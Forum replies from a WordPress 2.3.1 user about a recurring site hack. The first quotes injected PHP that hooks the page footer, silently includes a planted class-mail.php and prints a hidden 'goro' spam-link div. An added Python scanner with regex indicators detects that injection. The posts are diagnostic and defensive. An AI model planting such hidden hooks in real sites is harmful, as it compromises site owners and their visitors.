aspender
Forum Replies Created
Forum: Fixing WordPress
In reply to: 2.3.1 vulnerability
Just to be clear, the following got inserted into my page footer:

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
echo "<div id=\"goro\">";
foreach($wparr as $k=>$v){
echo "".ucwords($v['key'])."\n";
if($i++==$inum) break;
}
echo "</div>".$_footer;
}
}

However after googling for the goro div and finding some results on these forums, what appears to be different in this case is that wp-includes/default_filters.php was the file that included the hack, not a theme.
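A way to sweep an install for the traits visible in the snippet quoted above, as an added example that is not part of the original post: it flags a `wp_footer` hook whose callback is `wp` plus 32 hex characters, an error-suppressed include of `class-mail.php`, the `goro` div, and any file named `class-mail.php`. The sample text and its hex function name are constructed placeholders, and the function names are this example's own.

```python
import re
from pathlib import Path

# Indicators taken from the snippet quoted in the post above.
INDICATORS = {
    "wp_footer hook with wp+32-hex callback": re.compile(
        r"add_action\(\s*['\"]wp_footer['\"]\s*,\s*['\"]wp[0-9a-f]{32}['\"]", re.I),
    "error-suppressed include of class-mail.php": re.compile(
        r"@\s*include(?:_once)?\s*\(\s*['\"][^'\"]*class-mail\.php['\"]", re.I),
    "goro div": re.compile(r"id=\\?['\"]goro\\?['\"]", re.I),
}

def scan_text(text):
    """Return (line_number, indicator_name) pairs found in PHP source text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits

def scan_tree(root):
    """Scan every .php file under root; also report any file named class-mail.php."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if path.name == "class-mail.php":
            # Line 0 marks a finding about the file itself, not a source line.
            hits.append((0, "file named class-mail.php present"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample modelled on the quoted snippet (hex name is a placeholder).
SAMPLE = """<?php
add_filter('the_title', 'trim');
add_action('wp_footer','wp0123456789abcdef0123456789abcdef');
function wp0123456789abcdef0123456789abcdef() {
@include('./wp-includes/class-mail.php');
echo "<div id=\\"goro\\">";
}
"""

if __name__ == "__main__":
    for lineno, name in scan_text(SAMPLE):
        print(f"line {lineno}: {name}")
```

Call `scan_tree()` on the WordPress root directory; a hit in a core file such as the one named in the post means that file should be compared against a clean copy of the same release.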
Forum: Fixing WordPress
In reply to: 2.3.1 vulnerability
The hack above has happened again on my 2.3.1 blog. Again my host has confirmed that there weren't any successful FTP logins on or around the date that class-mail.php was placed on the server.
This page seems to have information about how to get rid of the hack, suggesting it has been seen elsewhere:
FYI, I am running WP 2.3.1 with the Tranquility 1.2 theme and the following plugins activated:
Akismet 2.0.2
DupPrevent 1.0
Feedburner Feedsmith 2.3
Google Search Widget 1.0
Google XML Sitemaps 3.0.1
ShareThis 2.0
Ultimate Google Analytics 1.5.3
Site is at http://adrianspender.com/blog I have removed the hack.
Can anybody else confirm they have seen this or give any reasonable explanation as to how the backdoor works?
Forum: Fixing WordPress
In reply to: 2.3.1 vulnerability
My host confirms that there were a number of attempted FTP logins from a Chinese IP on the day of the hack, but none of them were successful.